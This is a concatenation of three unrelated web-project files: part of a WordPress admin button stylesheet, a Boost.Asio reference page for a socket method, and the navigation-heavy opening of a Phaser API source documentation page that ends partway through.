font-size: 13px;
line-height: 26px;
height: 28px;
margin: 0;
padding: 0 10px 1px;
cursor: pointer;
border-width: 1px;
border-style: solid;
-webkit-appearance: none;
border-radius: 3px;
white-space: nowrap;
box-sizing: border-box;
}
/* Remove the dotted border on :focus and the extra padding in Firefox */
.wp-core-ui button::-moz-focus-inner,
.wp-core-ui input[type="reset"]::-moz-focus-inner,
.wp-core-ui input[type="button"]::-moz-focus-inner,
.wp-core-ui input[type="submit"]::-moz-focus-inner {
border-width: 0;
border-style: none;
padding: 0;
}
.wp-core-ui .button.button-large,
.wp-core-ui .button-group.button-large .button {
height: 30px;
line-height: 28px;
padding: 0 12px 2px;
}
.wp-core-ui .button.button-small,
.wp-core-ui .button-group.button-small .button {
height: 24px;
line-height: 22px;
padding: 0 8px 1px;
font-size: 11px;
}
.wp-core-ui .button.button-hero,
.wp-core-ui .button-group.button-hero .button {
font-size: 14px;
height: 46px;
line-height: 44px;
padding: 0 36px;
}
.wp-core-ui .button:active,
.wp-core-ui .button:focus {
outline: none;
}
.wp-core-ui .button.hidden {
display: none;
}
/* Style Reset buttons as simple text links */
.wp-core-ui input[type="reset"],
.wp-core-ui input[type="reset"]:hover,
.wp-core-ui input[type="reset"]:active,
.wp-core-ui input[type="reset"]:focus {
background: none;
border: none;
box-shadow: none;
padding: 0 2px 1px;
width: auto;
}
/* ----------------------------------------------------------------------------
2.0 - Default Button Style
---------------------------------------------------------------------------- */
.wp-core-ui .button,
.wp-core-ui .button-secondary {
color: #555;
border-color: #cccccc;
background: #f7f7f7;
box-shadow: 0 1px 0 #cccccc;
vertical-align: top;
}
.wp-core-ui p .button {
vertical-align: baseline;
}
.wp-core-ui .button.hover,
.wp-core-ui .button:hover,
.wp-core-ui .button-secondary:hover,
.wp-core-ui .button.focus,
.wp-core-ui .button:focus,
.wp-core-ui .button-secondary:focus {
background: #fafafa;
border-color: #999;
color: #23282d;
}
.wp-core-ui .button.focus,
.wp-core-ui .button:focus,
.wp-core-ui .button-secondary:focus {
border-color: #5b9dd9;
box-shadow: 0 0 3px rgba( 0, 115, 170, .8 );
}
.wp-core-ui .button.active,
.wp-core-ui .button.active:hover,
.wp-core-ui .button:active,
.wp-core-ui .button-secondary:active {
background: #eee;
border-color: #999;
box-shadow: inset 0 2px 5px -3px rgba( 0, 0, 0, 0.5 );
transform: translateY(1px);
}
.wp-core-ui .button.active:focus {
border-color: #5b9dd9;
box-shadow:
inset 0 2px 5px -3px rgba( 0, 0, 0, 0.5 ),
0 0 3px rgba( 0, 115, 170, .8 );
}
.wp-core-ui .button[disabled],
.wp-core-ui .button:disabled,
.wp-core-ui .button.disabled,
.wp-core-ui .button-secondary[disabled],
.wp-core-ui .button-secondary:disabled,
.wp-core-ui .button-secondary.disabled,
.wp-core-ui .button-disabled {
color: #a0a5aa !important;
border-color: #ddd !important;
background: #f7f7f7 !important;
box-shadow: none !important;
text-shadow: 0 1px 0 #fff !important;
cursor: default;
transform: none !important;
}
/* Buttons that look like links, for a cross of good semantics with the visual */
.wp-core-ui .button-link {
margin: 0;
padding: 0;
box-shadow: none;
border: 0;
border-radius: 0;
background: none;
outline: none;
cursor: pointer;
text-align: left;
/* Mimics the default link style in common.css */
color: #0073aa;
text-decoration: underline;
transition-property: border, background, color;
transition-duration: .05s;
transition-timing-function: ease-in-out;
}
.wp-core-ui .button-link:hover,
.wp-core-ui .button-link:active {
color: #00a0d2;
}
.wp-core-ui .button-link:focus {
color: #124964;
box-shadow:
0 0 0 1px #5b9dd9,
0 0 2px 1px rgba(30, 140, 190, .8);
}
.wp-core-ui .button-link-delete {
color: #a00;
}
.wp-core-ui .button-link-delete:hover,
.wp-core-ui .button-link-delete:focus {
color: #dc3232;
}
.ie8 .wp-core-ui .button-link:focus {
outline: #5b9dd9 solid 1px;
}
/* ----------------------------------------------------------------------------
3.0 - Primary Button Style
---------------------------------------------------------------------------- */
.wp-core-ui .button-primary {
background: #0085ba;
border-color: #0073aa #006799 #006799;
box-shadow: 0 1px 0 #006799;
color: #fff;
text-decoration: none;
text-shadow: 0 -1px 1px #006799,
1px 0 1px #006799,
0 1px 1px #006799,
-1px 0 1px #006799;
}
.wp-core-ui .button-primary.hover,
.wp-core-ui .button-primary:hover,
.wp-core-ui .button-primary.focus,
.wp-core-ui .button-primary:focus {
background: #008ec2;
border-color: #006799;
color: #fff;
}
.wp-core-ui .button-primary.focus,
.wp-core-ui .button-primary:focus {
box-shadow: 0 1px 0 #0073aa,
0 0 2px 1px #33b3db;
}
.wp-core-ui .button-primary.active,
.wp-core-ui .button-primary.active:hover,
.wp-core-ui .button-primary.active:focus,
.wp-core-ui .button-primary:active {
background: #0073aa;
border-color: #006799;
box-shadow: inset 0 2px 0 #006799;
vertical-align: top;
}
.wp-core-ui .button-primary[disabled],
.wp-core-ui .button-primary:disabled,
.wp-core-ui .button-primary-disabled,
.wp-core-ui .button-primary.disabled {
color: #66c6e4 !important;
background: #008ec2 !important;
border-color: #007cb2 !important;
box-shadow: none !important;
text-shadow: 0 -1px 0 rgba( 0, 0, 0, 0.1 ) !important;
cursor: default;
}
.wp-core-ui .button.button-primary.button-hero {
box-shadow: 0 2px 0 #006799;
}
.wp-core-ui .button.button-primary.button-hero.active,
.wp-core-ui .button.button-primary.button-hero.active:hover,
.wp-core-ui .button.button-primary.button-hero.active:focus,
.wp-core-ui .button.button-primary.button-hero:active {
box-shadow: inset 0 3px 0 #006799;
}
/* ----------------------------------------------------------------------------
4.0 - Button Groups
---------------------------------------------------------------------------- */
.wp-core-ui .button-group {
position: relative;
display: inline-block;
white-space: nowrap;
font-size: 0;
vertical-align: middle;
}
.wp-core-ui .button-group > .button {
display: inline-block;
border-radius: 0;
margin-right: -1px;
z-index: 10;
}
.wp-core-ui .button-group > .button-primary {
z-index: 100;
}
.wp-core-ui .button-group > .button:hover {
z-index: 20;
}
.wp-core-ui .button-group > .button:first-child {
border-radius: 3px 0 0 3px;
}
.wp-core-ui .button-group > .button:last-child {
border-radius: 0 3px 3px 0;
}
.wp-core-ui .button-group > .button:focus {
position: relative;
z-index: 1;
}
/* ----------------------------------------------------------------------------
5.0 - Responsive Button Styles
---------------------------------------------------------------------------- */
@media screen and ( max-width: 782px ) {
.wp-core-ui .button,
.wp-core-ui .button.button-large,
.wp-core-ui .button.button-small,
input#publish,
input#save-post,
a.preview {
padding: 6px 14px;
line-height: normal;
font-size: 14px;
vertical-align: middle;
height: auto;
margin-bottom: 4px;
}
#media-upload.wp-core-ui .button {
padding: 0 10px 1px;
height: 24px;
line-height: 22px;
font-size: 13px;
}
.media-frame.mode-grid .bulk-select .button {
margin-bottom: 0;
}
/* Publish Metabox Options */
.wp-core-ui .save-post-status.button {
position: relative;
margin: 0 14px 0 10px; /* 14px right margin to match all other buttons */
}
/* Reset responsive styles in Press This, Customizer */
.wp-core-ui.wp-customizer .button {
padding: 0 10px 1px;
font-size: 13px;
line-height: 26px;
height: 28px;
margin: 0;
vertical-align: inherit;
}
.media-modal-content .media-toolbar-primary .media-button {
margin-top: 10px;
margin-left: 5px;
}
/* Reset responsive styles on Log in button on iframed login form */
.interim-login .button.button-large {
height: 30px;
line-height: 28px;
padding: 0 12px 2px;
}
}
|
thirdparty/sources/boost_1_60_0/doc/html/boost_asio/reference/stream_socket_service/native_non_blocking/overload1.html
|
gwq5210/litlib
|
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>stream_socket_service::native_non_blocking (1 of 2 overloads)</title>
<link rel="stylesheet" href="../../../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.78.1">
<link rel="home" href="../../../../boost_asio.html" title="Boost.Asio">
<link rel="up" href="../native_non_blocking.html" title="stream_socket_service::native_non_blocking">
<link rel="prev" href="../native_non_blocking.html" title="stream_socket_service::native_non_blocking">
<link rel="next" href="overload2.html" title="stream_socket_service::native_non_blocking (2 of 2 overloads)">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table cellpadding="2" width="100%"><tr>
<td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../../boost.png"></td>
<td align="center"><a href="../../../../../../index.html">Home</a></td>
<td align="center"><a href="../../../../../../libs/libraries.htm">Libraries</a></td>
<td align="center"><a href="http://www.boost.org/users/people.html">People</a></td>
<td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td>
<td align="center"><a href="../../../../../../more/index.htm">More</a></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="../native_non_blocking.html"><img src="../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../native_non_blocking.html"><img src="../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../../boost_asio.html"><img src="../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="overload2.html"><img src="../../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
<div class="section">
<div class="titlepage"><div><div><h5 class="title">
<a name="boost_asio.reference.stream_socket_service.native_non_blocking.overload1"></a><a class="link" href="overload1.html" title="stream_socket_service::native_non_blocking (1 of 2 overloads)">stream_socket_service::native_non_blocking
(1 of 2 overloads)</a>
</h5></div></div></div>
<p>
Gets the non-blocking mode of the native socket implementation.
</p>
<pre class="programlisting"><span class="keyword">bool</span> <span class="identifier">native_non_blocking</span><span class="special">(</span>
<span class="keyword">const</span> <span class="identifier">implementation_type</span> <span class="special">&</span> <span class="identifier">impl</span><span class="special">)</span> <span class="keyword">const</span><span class="special">;</span>
</pre>
</div>
<table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr>
<td align="left"></td>
<td align="right"><div class="copyright-footer">Copyright © 2003-2015 Christopher M.
Kohlhoff<p>
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>)
</p>
</div></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="../native_non_blocking.html"><img src="../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../native_non_blocking.html"><img src="../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../../boost_asio.html"><img src="../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="overload2.html"><img src="../../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
</body>
</html>
|
lib/phaser/docs/src_pixi_renderers_canvas_utils_CanvasMaskManager.js.html
|
erbridge/fatal-attraction
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Phaser Source: src/pixi/renderers/canvas/utils/CanvasMaskManager.js</title>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/default.css">
<link type="text/css" rel="stylesheet" href="styles/sunlight.default.css">
<link type="text/css" rel="stylesheet" href="styles/site.cerulean.css">
</head>
<body>
<div class="container-fluid">
<div class="navbar navbar-fixed-top navbar-inverse">
<div style="position: absolute; width: 143px; height: 31px; right: 10px; top: 10px; z-index: 1050"><a href="http://phaser.io"><img src="img/phaser.png" border="0" /></a></div>
<div class="navbar-inner">
<a class="brand" href="index.html">Phaser API</a>
<ul class="nav">
<li class="dropdown">
<a href="namespaces.list.html" class="dropdown-toggle" data-toggle="dropdown">Namespaces<b
class="caret"></b></a>
<ul class="dropdown-menu ">
<li class="class-depth-0">
<a href="Phaser.html">Phaser</a>
</li>
<li class="class-depth-0">
<a href="PIXI.html">PIXI</a>
</li>
</ul>
</li>
<li class="dropdown">
<a href="classes.list.html" class="dropdown-toggle" data-toggle="dropdown">Classes<b
class="caret"></b></a>
<ul class="dropdown-menu ">
<li class="class-depth-1">
<a href="Phaser.Animation.html">Animation</a>
</li>
<li class="class-depth-1">
<a href="Phaser.AnimationManager.html">AnimationManager</a>
</li>
<li class="class-depth-1">
<a href="Phaser.AnimationParser.html">AnimationParser</a>
</li>
<li class="class-depth-1">
<a href="Phaser.ArraySet.html">ArraySet</a>
</li>
<li class="class-depth-1">
<a href="Phaser.ArrayUtils.html">ArrayUtils</a>
</li>
<li class="class-depth-1">
<a href="Phaser.AudioSprite.html">AudioSprite</a>
</li>
<li class="class-depth-1">
<a href="Phaser.BitmapData.html">BitmapData</a>
</li>
<li class="class-depth-1">
<a href="Phaser.BitmapText.html">BitmapText</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Button.html">Button</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Cache.html">Cache</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Camera.html">Camera</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Canvas.html">Canvas</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Circle.html">Circle</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Color.html">Color</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.Angle.html">Angle</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.Animation.html">Animation</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.AutoCull.html">AutoCull</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.Bounds.html">Bounds</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.BringToTop.html">BringToTop</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.Core.html">Core</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.Crop.html">Crop</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.Delta.html">Delta</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.Destroy.html">Destroy</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.FixedToCamera.html">FixedToCamera</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.Health.html">Health</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.InCamera.html">InCamera</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.InputEnabled.html">InputEnabled</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.InWorld.html">InWorld</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.LifeSpan.html">LifeSpan</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.LoadTexture.html">LoadTexture</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.Overlap.html">Overlap</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.PhysicsBody.html">PhysicsBody</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.Reset.html">Reset</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.ScaleMinMax.html">ScaleMinMax</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Component.Smoothed.html">Smoothed</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Create.html">Create</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Creature.html">Creature</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Device.html">Device</a>
</li>
<li class="class-depth-1">
<a href="Phaser.DeviceButton.html">DeviceButton</a>
</li>
<li class="class-depth-1">
<a href="Phaser.DOM.html">DOM</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Easing.html">Easing</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Back.html">Back</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Bounce.html">Bounce</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Circular.html">Circular</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Cubic.html">Cubic</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Elastic.html">Elastic</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Exponential.html">Exponential</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Linear.html">Linear</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Quadratic.html">Quadratic</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Quartic.html">Quartic</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Quintic.html">Quintic</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Sinusoidal.html">Sinusoidal</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Ellipse.html">Ellipse</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Events.html">Events</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Filter.html">Filter</a>
</li>
<li class="class-depth-1">
<a href="Phaser.FlexGrid.html">FlexGrid</a>
</li>
<li class="class-depth-1">
<a href="Phaser.FlexLayer.html">FlexLayer</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Frame.html">Frame</a>
</li>
<li class="class-depth-1">
<a href="Phaser.FrameData.html">FrameData</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Game.html">Game</a>
</li>
<li class="class-depth-1">
<a href="Phaser.GameObjectCreator.html">GameObjectCreator</a>
</li>
<li class="class-depth-1">
<a href="Phaser.GameObjectFactory.html">GameObjectFactory</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Gamepad.html">Gamepad</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Graphics.html">Graphics</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Group.html">Group</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Image.html">Image</a>
</li>
<li class="class-depth-1">
<a href="Phaser.ImageCollection.html">ImageCollection</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Input.html">Input</a>
</li>
<li class="class-depth-1">
<a href="Phaser.InputHandler.html">InputHandler</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Key.html">Key</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Keyboard.html">Keyboard</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Line.html">Line</a>
</li>
<li class="class-depth-1">
<a href="Phaser.LinkedList.html">LinkedList</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Loader.html">Loader</a>
</li>
<li class="class-depth-1">
<a href="Phaser.LoaderParser.html">LoaderParser</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Math.html">Math</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Matrix.html">Matrix</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Mouse.html">Mouse</a>
</li>
<li class="class-depth-1">
<a href="Phaser.MSPointer.html">MSPointer</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Net.html">Net</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Particle.html">Particle</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Particles.html">Particles</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Particles.Arcade.html">Arcade</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Particles.Arcade.Emitter.html">Emitter</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Physics.html">Physics</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Physics.Arcade.html">Arcade</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.Arcade.Body.html">Body</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.Arcade.html#TilemapCollision">TilemapCollision</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Physics.Ninja.html">Ninja</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.Ninja.AABB.html">AABB</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.Ninja.Body.html">Body</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.Ninja.Circle.html">Circle</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.Ninja.Tile.html">Tile</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Physics.P2.html">P2</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.Body.html">Body</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.BodyDebug.html">BodyDebug</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.CollisionGroup.html">CollisionGroup</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.ContactMaterial.html">ContactMaterial</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.DistanceConstraint.html">DistanceConstraint</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.FixtureList.html">FixtureList</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.GearConstraint.html">GearConstraint</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.InversePointProxy.html">InversePointProxy</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.LockConstraint.html">LockConstraint</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.Material.html">Material</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.PointProxy.html">PointProxy</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.PrismaticConstraint.html">PrismaticConstraint</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.RevoluteConstraint.html">RevoluteConstraint</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.RotationalSpring.html">RotationalSpring</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.Spring.html">Spring</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Plugin.html">Plugin</a>
</li>
<li class="class-depth-1">
<a href="Phaser.PluginManager.html">PluginManager</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Point.html">Point</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Pointer.html">Pointer</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Polygon.html">Polygon</a>
</li>
<li class="class-depth-1">
<a href="Phaser.QuadTree.html">QuadTree</a>
</li>
<li class="class-depth-1">
<a href="Phaser.RandomDataGenerator.html">RandomDataGenerator</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Rectangle.html">Rectangle</a>
</li>
<li class="class-depth-1">
<a href="Phaser.RenderTexture.html">RenderTexture</a>
</li>
<li class="class-depth-1">
<a href="Phaser.RequestAnimationFrame.html">RequestAnimationFrame</a>
</li>
<li class="class-depth-1">
<a href="Phaser.RetroFont.html">RetroFont</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Rope.html">Rope</a>
</li>
<li class="class-depth-1">
<a href="Phaser.RoundedRectangle.html">RoundedRectangle</a>
</li>
<li class="class-depth-1">
<a href="Phaser.ScaleManager.html">ScaleManager</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Signal.html">Signal</a>
</li>
<li class="class-depth-1">
<a href="Phaser.SignalBinding.html">SignalBinding</a>
</li>
<li class="class-depth-1">
<a href="Phaser.SinglePad.html">SinglePad</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Sound.html">Sound</a>
</li>
<li class="class-depth-1">
<a href="Phaser.SoundManager.html">SoundManager</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Sprite.html">Sprite</a>
</li>
<li class="class-depth-1">
<a href="Phaser.SpriteBatch.html">SpriteBatch</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Stage.html">Stage</a>
</li>
<li class="class-depth-1">
<a href="Phaser.State.html">State</a>
</li>
<li class="class-depth-1">
<a href="Phaser.StateManager.html">StateManager</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Text.html">Text</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Tile.html">Tile</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Tilemap.html">Tilemap</a>
</li>
<li class="class-depth-1">
<a href="Phaser.TilemapLayer.html">TilemapLayer</a>
</li>
<li class="class-depth-1">
<a href="Phaser.TilemapParser.html">TilemapParser</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Tileset.html">Tileset</a>
</li>
<li class="class-depth-1">
<a href="Phaser.TileSprite.html">TileSprite</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Time.html">Time</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Timer.html">Timer</a>
</li>
<li class="class-depth-1">
<a href="Phaser.TimerEvent.html">TimerEvent</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Touch.html">Touch</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Tween.html">Tween</a>
</li>
<li class="class-depth-1">
<a href="Phaser.TweenData.html">TweenData</a>
</li>
<li class="class-depth-1">
<a href="Phaser.TweenManager.html">TweenManager</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Utils.html">Utils</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Utils.Debug.html">Debug</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Video.html">Video</a>
</li>
<li class="class-depth-1">
<a href="Phaser.World.html">World</a>
</li>
<li class="class-depth-1">
<a href="PIXI.AbstractFilter.html">AbstractFilter</a>
</li>
<li class="class-depth-1">
<a href="PIXI.BaseTexture.html">BaseTexture</a>
</li>
<li class="class-depth-1">
<a href="PIXI.CanvasBuffer.html">CanvasBuffer</a>
</li>
<li class="class-depth-1">
<a href="PIXI.CanvasGraphics.html">CanvasGraphics</a>
</li>
<li class="class-depth-1">
<a href="PIXI.CanvasMaskManager.html">CanvasMaskManager</a>
</li>
<li class="class-depth-1">
<a href="PIXI.CanvasRenderer.html">CanvasRenderer</a>
</li>
<li class="class-depth-1">
<a href="PIXI.CanvasTinter.html">CanvasTinter</a>
</li>
<li class="class-depth-1">
<a href="PIXI.ComplexPrimitiveShader.html">ComplexPrimitiveShader</a>
</li>
<li class="class-depth-1">
<a href="PIXI.DisplayObject.html">DisplayObject</a>
</li>
<li class="class-depth-1">
<a href="PIXI.DisplayObjectContainer.html">DisplayObjectContainer</a>
</li>
<li class="class-depth-1">
<a href="PIXI.Event.html">Event</a>
</li>
<li class="class-depth-1">
<a href="PIXI.EventTarget.html">EventTarget</a>
</li>
<li class="class-depth-1">
<a href="PIXI.FilterTexture.html">FilterTexture</a>
</li>
<li class="class-depth-1">
<a href="PIXI.Graphics.html">Graphics</a>
</li>
<li class="class-depth-1">
<a href="PIXI.GraphicsData.html">GraphicsData</a>
</li>
<li class="class-depth-1">
<a href="PIXI.PIXI.html">PIXI</a>
</li>
<li class="class-depth-1">
<a href="PIXI.PixiFastShader.html">PixiFastShader</a>
</li>
<li class="class-depth-1">
<a href="PIXI.PixiShader.html">PixiShader</a>
</li>
<li class="class-depth-1">
<a href="PIXI.PolyK.html">PolyK</a>
</li>
<li class="class-depth-1">
<a href="PIXI.PrimitiveShader.html">PrimitiveShader</a>
</li>
<li class="class-depth-1">
<a href="PIXI.RenderTexture.html">RenderTexture</a>
</li>
<li class="class-depth-1">
<a href="PIXI.Rope.html">Rope</a>
</li>
<li class="class-depth-1">
<a href="PIXI.Sprite.html">Sprite</a>
</li>
<li class="class-depth-1">
<a href="PIXI.SpriteBatch.html">SpriteBatch</a>
</li>
<li class="class-depth-1">
<a href="PIXI.Stage.html">Stage</a>
</li>
<li class="class-depth-1">
<a href="PIXI.Strip.html">Strip</a>
</li>
<li class="class-depth-1">
<a href="PIXI.StripShader.html">StripShader</a>
</li>
<li class="class-depth-1">
<a href="PIXI.Texture.html">Texture</a>
</li>
<li class="class-depth-1">
<a href="PIXI.TilingSprite.html">TilingSprite</a>
</li>
<li class="class-depth-1">
<a href="PIXI.WebGLBlendModeManager.html">WebGLBlendModeManager</a>
</li>
<li class="class-depth-1">
<a href="PIXI.WebGLFastSpriteBatch.html">WebGLFastSpriteBatch</a>
</li>
<li class="class-depth-1">
<a href="PIXI.WebGLFilterManager.html">WebGLFilterManager</a>
</li>
<li class="class-depth-1">
<a href="PIXI.WebGLRenderer.html">WebGLRenderer</a>
</li>
</ul>
</li>
<li class="dropdown">
<a href="global.html" class="dropdown-toggle" data-toggle="dropdown">Global<b
class="caret"></b></a>
<ul class="dropdown-menu ">
<li class="class-depth-0">
<a href="global.html#AUTO">AUTO</a>
</li>
<li class="class-depth-0">
<a href="global.html#BITMAPDATA">BITMAPDATA</a>
</li>
<li class="class-depth-0">
<a href="global.html#BITMAPTEXT">BITMAPTEXT</a>
</li>
<li class="class-depth-0">
<a href="global.html#blendModes">blendModes</a>
</li>
<li class="class-depth-0">
<a href="global.html#BUTTON">BUTTON</a>
</li>
<li class="class-depth-0">
<a href="global.html#CANVAS">CANVAS</a>
</li>
<li class="class-depth-0">
<a href="global.html#CANVAS_FILTER">CANVAS_FILTER</a>
</li>
<li class="class-depth-0">
<a href="global.html#CIRCLE">CIRCLE</a>
</li>
<li class="class-depth-0">
<a href="global.html#CREATURE">CREATURE</a>
</li>
<li class="class-depth-0">
<a href="global.html#DOWN">DOWN</a>
</li>
<li class="class-depth-0">
<a href="global.html#ELLIPSE">ELLIPSE</a>
</li>
<li class="class-depth-0">
<a href="global.html#EMITTER">EMITTER</a>
</li>
<li class="class-depth-0">
<a href="global.html#GAMES">GAMES</a>
</li>
<li class="class-depth-0">
<a href="global.html#GRAPHICS">GRAPHICS</a>
</li>
<li class="class-depth-0">
<a href="global.html#GROUP">GROUP</a>
</li>
<li class="class-depth-0">
<a href="global.html#HEADLESS">HEADLESS</a>
</li>
<li class="class-depth-0">
<a href="global.html#IMAGE">IMAGE</a>
</li>
<li class="class-depth-0">
<a href="global.html#LEFT">LEFT</a>
</li>
<li class="class-depth-0">
<a href="global.html#LINE">LINE</a>
</li>
<li class="class-depth-0">
<a href="global.html#MATRIX">MATRIX</a>
</li>
<li class="class-depth-0">
<a href="global.html#NONE">NONE</a>
</li>
<li class="class-depth-0">
<a href="global.html#POINT">POINT</a>
</li>
<li class="class-depth-0">
<a href="global.html#POINTER">POINTER</a>
</li>
<li class="class-depth-0">
<a href="global.html#POLYGON">POLYGON</a>
</li>
<li class="class-depth-0">
<a href="global.html#RECTANGLE">RECTANGLE</a>
</li>
<li class="class-depth-0">
<a href="global.html#RENDERTEXTURE">RENDERTEXTURE</a>
</li>
